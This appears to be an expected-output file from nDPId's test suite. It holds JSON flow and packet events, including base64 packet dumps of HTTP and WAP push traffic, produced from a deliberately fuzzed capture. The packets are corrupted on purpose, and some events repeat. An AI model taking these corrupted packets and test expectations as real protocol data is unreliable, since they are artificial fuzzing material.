00587{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":22,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1031854489007,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":143,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":143,"pkt_l4_len":109,"thread_ts_msec":1031854489007,"pkt":"CAAgsl17AFCLk5N8CABFAACB\/UpAAIAGnvGsFAMBrBQDDQBQz4zkTZoPybTxE1AYHbQX8gAASFRUUC8xLjEgMTAwIENvbnRpbnVlDQpTZXJ2ZXI6IE1pY3Jvc29mdC1JSVMvNC4wDQpQYXRlOiBUaHUsIDEyIFNlcCAyMDAyIDE3OjU4OjU2IEdNVA0KDQo="}
00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":24,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854489031,"flow_last_seen":1031854489031,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1031854489031,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.57.3.13","src_port":80,"dst_port":53132,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00655{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1031854489031,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":195,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":195,"pkt_l4_len":161,"thread_ts_msec":1031854489031,"pkt":"CAAgsl17AFCLk5N8CABFAAC1\/kpAAIAGnb2sFAMFrDkDDQBQz4zkTZpoybTxE1AYHbQrwQAASFRUby8xLjEgMjAyIEFjY2VwdGVkDQpTZXJ2ZXI6IE1pY3Jvc29mdC1JSVMvNC4wDQpEYXRlOiBUaHUsIDEyIFNlcCAyMDUyIDE3OjU4OjU2IEdNVA0KQ29udGVudC1MZW5ndGg6IDQyNw0KJXMAdGVudC1UeXBlOiBhcHBsaWNhdGlvbi94bWwNCg0K"}
00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":26,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854489131,"flow_last_seen":1031854489131,"flow_idle_time":7560000,"flow_min_l4_payload_len":427,"flow_max_l4_payload_len":427,"flow_tot_l4_payload_len":427,"flow_avg_l4_payload_len":427,"midstream":1,"thread_ts_msec":1031854489131,"l3_proto":"ip4","src_ip":"172.6.3.5","dst_ip":"172.20.3.13","src_port":80,"dst_port":53132,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
01039{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":26,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1031854489131,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":481,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":481,"pkt_l4_len":447,"thread_ts_msec":1031854489131,"pkt":"CAAgsl17AFCLk5N8CABFAAHT\/0pAAIAGm5+sBgMFrBQDDQBQz4zkTZr1ybTxE1AYHbTqTgAAPD94bWwgdmVyc2lvbj0iMS4wIj8+CjwhRE9DVFlQRSBwYXAgUFVCTElDICItLy9XQVBGT1JVTS8vRFREIFBBUCAxLjAvL0VOIgogICAgICAgICAgImh0dHA6Ly93d3cud2FwZm9ydW0ub3JnL0RURC9wYXBfMS4wLmR0ZCI+CjxwYXA+CiAgPHB1c2gtcmVzcG9uc2UgcnVzaC1pZD0iMTg5MzAxXzEwMzE4NTQ0ODg5OTdfMTAzOEBnZWNkczIubW9iaWxpdHlsYWIubmV0IiBzZW5kZXKtYWRkcmVzcz0iaHR0cDovL2xtY21vbGYud2FwbWF0aWMuZGUiIHNlbmRlcuRuYW1lPSJ3Z3A0IiByZXBseS2qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqg=="}
00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":33,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854495447,"flow_last_seen":1031854495447,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1031854495447,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.21.3.13","src_port":2602,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":33,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1031854495447,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1031854495447,"pkt":"CAAgsl17AFCLk5N8CABFAAAsB0tAAIAGlUasFAMFrBUDDQoqAFDkZMdqAADsAGACIABjogAAAgQFtFQI"}
00198{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":34,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","layer_type":2177,"global_ts_msec":1031854495447}
00363{"packet_event_id":1,"packet_event_name":"packet","packet_id":34,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":58,"pkt_type":2177,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":58,"pkt_l4_len":0,"thread_ts_msec":1031854495447,"pkt":"AFCLk5N8CAAgsl17CIFFAAAsxLVAAEAGF9ysFAMNTBQDBQBQCirJ0lLg5GTHa2ASgywbsgAAAgQFtA=="}
00216{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":35,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","l4_data_len":26,"global_ts_msec":1031854495447}
00363{"packet_event_id":1,"packet_event_name":"packet","packet_id":35,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1031854495447,"pkt":"CAAgskZ7AFCLk5N8CABFAAAoCKqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq"}
00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":36,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854495447,"flow_last_seen":1031854495447,"flow_idle_time":7440000,"flow_min_l4_payload_len":708,"flow_max_l4_payload_len":708,"flow_tot_l4_payload_len":708,"flow_avg_l4_payload_len":708,"midstream":1,"thread_ts_msec":1031854495447,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.3.13","src_port":2602,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
01411{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":36,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1031854495447,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":762,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":762,"pkt_l4_len":728,"thread_ts_msec":1031854495447,"pkt":"CAAgsl17AFCLk5N8CABFAALsCUtAAIAGkIasFAMFrBQDDQoqAFDkZMdrbtIa4VAYIjhGCgAAUE9TVCAuc2VydmxldHMvbW1zIEhUVFAvMS4xDQpIb3N0OiAxNzIuMjAuMy4xMw0KQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi94bWwNCkNvbnRlbnQtTGVuZ3RoOiA2MDYNCg0KPD94bWwgdmVyc2lvbj0iMS4wIj8+CjwhRE9DVFlQRSBwYXAgUFVCTElDICItLy9XQb9GT1JVTS8vRFREIFBBUCAxLjAvL0VOIgogICAgICAgICAgImh0dHA6Ly93d3cud2FwZm9ydW0ub3JnL0RURC9yYXBfMS4wLmR0byI+CjxwYXA+CiAgPHJlc3VhdG5vdGlmaWNhdGlvbi1tZXNzYWdlIHB1c2gtaWQ9IjE4OTMwMV8xMDMxODU0NDg4OTk3XzEwMzhAZ2VjZHMyLm1vYmlsaXR5bGFiLm9ldCIgc2VuZGVyLWFkJHJlc3M9Imh0dHA6Ly9sbWNtb2xmLndhcG1hdGljLmRlIiBzZW5kZXItbmFtZT0id2dwNCIgcmVjZWl2ZWQtdGltZT0iMjAwMi0wOS0xMlQxNzo1ODo1NloiIGV2ZW50LXRpbWU9IjIwMDItMDktMTJUMTc6NTk6MDJaIiBtZaqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq"}
00886{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":36,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854495447,"flow_last_seen":1031854495447,"flow_idle_time":7440000,"flow_min_l4_payload_len":708,"flow_max_l4_payload_len":708,"flow_tot_l4_payload_len":708,"flow_avg_l4_payload_len":708,"midstream":1,"thread_ts_msec":1031854495447,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.3.13","src_port":2602,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"172.20.3.13","url":"172.20.3.13.servlets\/mms","code":0,"content_type":"","user_agent":""}}
00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":37,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1031854495448,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1031854495448,"pkt":"AFCLk5N8CAAgsl17CABFAAAoxLZAAEAGF9+sFAMNrBQDBQBQCirJ0hrh5GTKL1AQgywwqwAA"}
01121{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":38,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":3,"flow_last_seen":1031854495554,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":541,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":541,"pkt_l4_len":507,"thread_ts_msec":1031854495554,"pkt":"AFCLk5N8CAAgsjZ7CABFAAIPxLdAAEAGU\/esFAMNrBQDBQBQCirJ0hrh5GTKL1AYgyw7RQAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IFJlc2luLzIuMC4xDQpDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL3htbA0KY29udGVudC1MZW5ndGg6IDM1OA0KRGF0ZTogVGh1LCAxMiBTZXAgMjAwMiAxODoxNDo1NSBHTVQNCg0KPD94bWzfdmVyc2lvbj0iMS4wIj8+DQo8IURPQ1RZUEUgcGFwIFBVQkxJQyAiLS8vV0FQRk\/+VU0vL0RURCBQQVAgMS4wLy9FTiIgImh0dHA6Ly93d3cud2FwZlVyd20ub3JnL0RURC9wYXBfMS4wL2R0ZCI+DVQ8cGFwPg0KPHJlc3VsdG5vdGlmaWNhdGlvbi1yZXNwb25zZSBwdXNoLWlkPSIxODkzMDFfMTAzMTg1NDQ4ODk5N18xMDM4QGdlY2RzMi5tb2JpbGl0eWxhYi5uZXQiIGNvZGU9IjEwMDAiIGRlc2M9Ik93Ij4NCjxhZ2RyZXPPIDNkZHJlc3MtdmFsdWU9IldBUFBVU0g9KzQ5MTcyNjEwMTAwNC9UWVBFclBMTU5AMTcyLjIwLjMuNSI+PC9hZGRyZXNzPg0KPC9yZXN1bHRub3RpZmljYXRpb24tcmVzcCVzAGU+DQo8L3BhcKqqqg=="}
00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":41,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854499919,"flow_last_seen":1031854499919,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854499919,"l3_proto":"ip4","src_ip":"172.20.3.88","dst_ip":"172.20.3.82","src_port":80,"dst_port":2601,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":41,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1031854499919,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1031854499919,"pkt":"AFCLk5N8CAAgsl17CABFAAAoxLhAAEAGF92sFANYrBQDUgBQCinJpw4S5EvBTlAQgyxGoAAA"}
00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":48,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854514843,"flow_last_seen":1031854514843,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1031854514843,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.3.13","src_port":2603,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":48,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1031854514843,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1031854514843,"pkt":"CAAgsl17AFCLk5N8CABFAAAsE0tAAIAGiUasFAMFrBQDDQorAFDkqWrQAAAAAGACIAC\/9gAAAgQFtGDD"}
00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":49,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1031854514843,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1031854514843,"pkt":"AFCLk5N8CAAgsl17CABFAAAsxLxAAEAGF9WsFAMNrBQDBQBQCivKHToI5Klq0WASgyxYkwAAAgQFtA=="}
00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":50,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854514843,"flow_last_seen":1031854514843,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854514843,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.3.77","src_port":2603,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":50,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1031854514843,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1031854514843,"pkt":"CAAgsl17AFCLk5N8CABFAAAoFEtAAIAGiEqsFAMFrBQDTQorAFDkqWrRyh06CVAQIjjRRAAAAgQFtGDD"}
00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":36,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854495447,"flow_last_seen":1031854495447,"flow_idle_time":7560000,"flow_min_l4_payload_len":708,"flow_max_l4_payload_len":708,"flow_tot_l4_payload_len":708,"flow_avg_l4_payload_len":708,"midstream":1,"thread_ts_msec":1031854495447,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.3.13","src_port":2602,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
01411{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":36,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1031854495447,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":762,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":762,"pkt_l4_len":728,"thread_ts_msec":1031854495447,"pkt":"CAAgsl17AFCLk5N8CABFAALsCUtAAIAGkIasFAMFrBQDDQoqAFDkZMdrbtIa4VAYIjhGCgAAUE9TVCAuc2VydmxldHMvbW1zIEhUVFAvMS4xDQpIb3N0OiAxNzIuMjAuMy4xMw0KQ29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi94bWwNCkNvbnRlbnQtTGVuZ3RoOiA2MDYNCg0KPD94bWwgdmVyc2lvbj0iMS4wIj8+CjwhRE9DVFlQRSBwYXAgUFVCTElDICItLy9XQb9GT1JVTS8vRFREIFBBUCAxLjAvL0VOIgogICAgICAgICAgImh0dHA6Ly93d3cud2FwZm9ydW0ub3JnL0RURC9yYXBfMS4wLmR0byI+CjxwYXA+CiAgPHJlc3VhdG5vdGlmaWNhdGlvbi1tZXNzYWdlIHB1c2gtaWQ9IjE4OTMwMV8xMDMxODU0NDg4OTk3XzEwMzhAZ2VjZHMyLm1vYmlsaXR5bGFiLm9ldCIgc2VuZGVyLWFkJHJlc3M9Imh0dHA6Ly9sbWNtb2xmLndhcG1hdGljLmRlIiBzZW5kZXItbmFtZT0id2dwNCIgcmVjZWl2ZWQtdGltZT0iMjAwMi0wOS0xMlQxNzo1ODo1NloiIGV2ZW50LXRpbWU9IjIwMDItMDktMTJUMTc6NTk6MDJaIiBtZaqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq"}
00886{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":36,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854495447,"flow_last_seen":1031854495447,"flow_idle_time":7560000,"flow_min_l4_payload_len":708,"flow_max_l4_payload_len":708,"flow_tot_l4_payload_len":708,"flow_avg_l4_payload_len":708,"midstream":1,"thread_ts_msec":1031854495447,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.3.13","src_port":2602,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"172.20.3.13","url":"172.20.3.13.servlets\/mms","code":0,"content_type":"","user_agent":""}}
00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":37,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1031854495448,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1031854495448,"pkt":"AFCLk5N8CAAgsl17CABFAAAoxLZAAEAGF9+sFAMNrBQDBQBQCirJ0hrh5GTKL1AQgywwqwAA"}
01121{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":38,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":3,"flow_last_seen":1031854495554,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":541,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":541,"pkt_l4_len":507,"thread_ts_msec":1031854495554,"pkt":"AFCLk5N8CAAgsjZ7CABFAAIPxLdAAEAGU\/esFAMNrBQDBQBQCirJ0hrh5GTKL1AYgyw7RQAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IFJlc2luLzIuMC4xDQpDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL3htbA0KY29udGVudC1MZW5ndGg6IDM1OA0KRGF0ZTogVGh1LCAxMiBTZXAgMjAwMiAxODoxNDo1NSBHTVQNCg0KPD94bWzfdmVyc2lvbj0iMS4wIj8+DQo8IURPQ1RZUEUgcGFwIFBVQkxJQyAiLS8vV0FQRk\/+VU0vL0RURCBQQVAgMS4wLy9FTiIgImh0dHA6Ly93d3cud2FwZlVyd20ub3JnL0RURC9wYXBfMS4wL2R0ZCI+DVQ8cGFwPg0KPHJlc3VsdG5vdGlmaWNhdGlvbi1yZXNwb25zZSBwdXNoLWlkPSIxODkzMDFfMTAzMTg1NDQ4ODk5N18xMDM4QGdlY2RzMi5tb2JpbGl0eWxhYi5uZXQiIGNvZGU9IjEwMDAiIGRlc2M9Ik93Ij4NCjxhZ2RyZXPPIDNkZHJlc3MtdmFsdWU9IldBUFBVU0g9KzQ5MTcyNjEwMTAwNC9UWVBFclBMTU5AMTcyLjIwLjMuNSI+PC9hZGRyZXNzPg0KPC9yZXN1bHRub3RpZmljYXRpb24tcmVzcCVzAGU+DQo8L3BhcKqqqg=="}
00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":41,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854499919,"flow_last_seen":1031854499919,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854499919,"l3_proto":"ip4","src_ip":"172.20.3.88","dst_ip":"172.20.3.82","src_port":80,"dst_port":2601,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":41,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1031854499919,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1031854499919,"pkt":"AFCLk5N8CAAgsl17CABFAAAoxLhAAEAGF92sFANYrBQDUgBQCinJpw4S5EvBTlAQgyxGoAAA"}
00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":48,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854514843,"flow_last_seen":1031854514843,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1031854514843,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.3.13","src_port":2603,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":48,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1031854514843,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1031854514843,"pkt":"CAAgsl17AFCLk5N8CABFAAAsE0tAAIAGiUasFAMFrBQDDQorAFDkqWrQAAAAAGACIAC\/9gAAAgQFtGDD"}
00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":49,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1031854514843,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1031854514843,"pkt":"AFCLk5N8CAAgsl17CABFAAAsxLxAAEAGF9WsFAMNrBQDBQBQCivKHToI5Klq0WASgyxYkwAAAgQFtA=="}
00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":50,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854514843,"flow_last_seen":1031854514843,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854514843,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.3.77","src_port":2603,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":50,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1031854514843,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1031854514843,"pkt":"CAAgsl17AFCLk5N8CABFAAAoFEtAAIAGiEqsFAMFrBQDTQorAFDkqWrRyh06CVAQIjjRRAAAAgQFtGDD"}
00218{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":51,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","l4_data_len":1480,"global_ts_msec":1031854514844}
